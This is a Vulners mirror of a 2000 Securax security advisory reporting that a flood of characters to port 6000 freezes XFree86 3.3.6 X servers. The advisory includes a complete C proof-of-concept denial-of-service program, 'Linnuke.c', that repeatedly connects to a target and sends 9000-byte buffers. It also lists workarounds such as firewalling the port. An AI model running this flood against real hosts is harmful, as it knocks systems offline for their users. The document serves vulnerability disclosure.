Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

scx-sa-11.txt

🗓️ 01 Jan 2001 00:00:00Reported by Root-dudeType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 20 Views

X-windows can freeze due to high character traffic, causing denial of service on servers.

Code
`=============================================================================  
Securax-SA-11 Security Advisory  
belgian.networking.security Dutch  
=============================================================================  
Topic: X-windows can be caused to freeze.  
Announced: 2000-12-26  
Affects: XFree86 Version 3.3.6 / X Window System [on SuSE 6.4]  
Other versions not tested.  
=============================================================================  
  
  
  
Note: This entire advisory has been based upon trial and error results. We  
can not ensure the information below is 100% correct being that we have  
no source code to audit. This document is subject to change without  
prior notice.  
  
If you happen to find more information or problems concerning the below  
problem or further varients please contact me on the following email  
[email protected] (or [email protected]), or you can contact the securax  
[email protected].  
  
I. Problem Description  
-----------------------  
  
When a large amount of characters are send to the X-windows deamon (port 6000  
), X-windows will become laggy for a few secondes, so if one would send a  
lot of characters to it, in a continious loop, the server will freeze!, the  
only thing that works as far as I know to get X back to work is a reboot.  
  
II. Impact  
----------  
  
X-windows servers can be caused to be laggy and even to freeze, the code in  
this advisory is proof of concept code for this DoS.  
  
/* --| BOF |-- */  
  
/* Linnuke.c (DoS)  
*  
* written by R00T-dude  
*  
* first of all, why the lame name  
* remember in the "good old days" the winnuke.c  
* well this gives about the same effect on linux  
* and probably any other form of unix that has   
* X-windows port (6000) open.  
*   
* I found this when I was playing around with   
* this stresstool I was coding, I noticed my  
* X-win became pretty laggy when I sended 9000 A's  
* to port 6000, so I started coding on some   
* easy poc code for X-win and well, euh, ...   
* X-win FROZE !!!, so far all you can do to  
* get X to work again is reboot.  
*  
* In no way, form or shape can I nor the securax crew  
* be held responsible for any use and/or misuse of this  
* code.  
*  
* greetz to: |ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0,  
* t-omicron, [tosh], demongirl, zym0t1c,segfau|t, so many others I forgot  
*  
*/  
  
#include <stdio.h>  
#include <sys/socket.h>  
#include <netdb.h>  
#include <netinet/in.h>  
#include <string.h>  
  
main(int argc, char **argv)  
{  
int sock, conn, i, b;  
char buff[10000];  
struct sockaddr_in sin;  
struct hostent *hp;  
  
for(i=0; i<9000; i++)  
{  
strcat(buff, "\x41"); /* SHELLCODE ?? :) */  
}  
strcat(buff, "\n");  
  
if( (hp=gethostbyname(argv[1])) == NULL)  
{  
fprintf(stderr, "Gethostbyname() !"); exit(0);  
}  
  
for(b=0; b < b +1; b++)  
{  
sock = socket(AF_INET, SOCK_STREAM, 0);  
if (sock < 0)  
{  
fprintf(stderr, "Socket() !\n"); exit(sock);  
}  
sin.sin_family = AF_INET;  
sin.sin_port = 6000;  
sin.sin_addr.s_addr = inet_addr(argv[1]);  
  
conn = connect(sock, (struct sockaddr *)&sin, sizeof(sin));  
if (conn < 0)  
{  
printf("Connect() !\n");  
/* don't exit(); or the loop will stop */  
}  
  
send(sock, buff, sizeof(buff), 0);  
close(sock);  
}  
}  
  
/* --| EOF |-- */  
  
III. possible workarounds  
-------------------------  
  
possible workarounds :: - don't use X, who needs it anyway  
- close the X-win port  
- filter the X-win port with a decent firewall  
(however, you can still be Dossed (local))  
- use windows (euh, nevermind)  
  
IV credits  
----------  
  
thx go out to : Incubus for testing  
greetz go out to :|ncubus, f0bic, F_F, nostalg1c, |vorlon, cicer0, t-omicron,  
[tosh], demongirl, zym0t1c,segfau|t, so many others I forgot  
  
-R00T-dude([email protected] or [email protected]).  
=============================================================================  
For more information [email protected]  
Website http://www.securax.org  
Advisories/Text http://www.securax.org/pers  
-----------------------------------------------------------------------------  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jan 2001 00:00Current
7.4High risk
Vulners AI Score7.4
x-windows freezedenial of servicexfree86 version 3.3.6suse 6.4security advisory.
20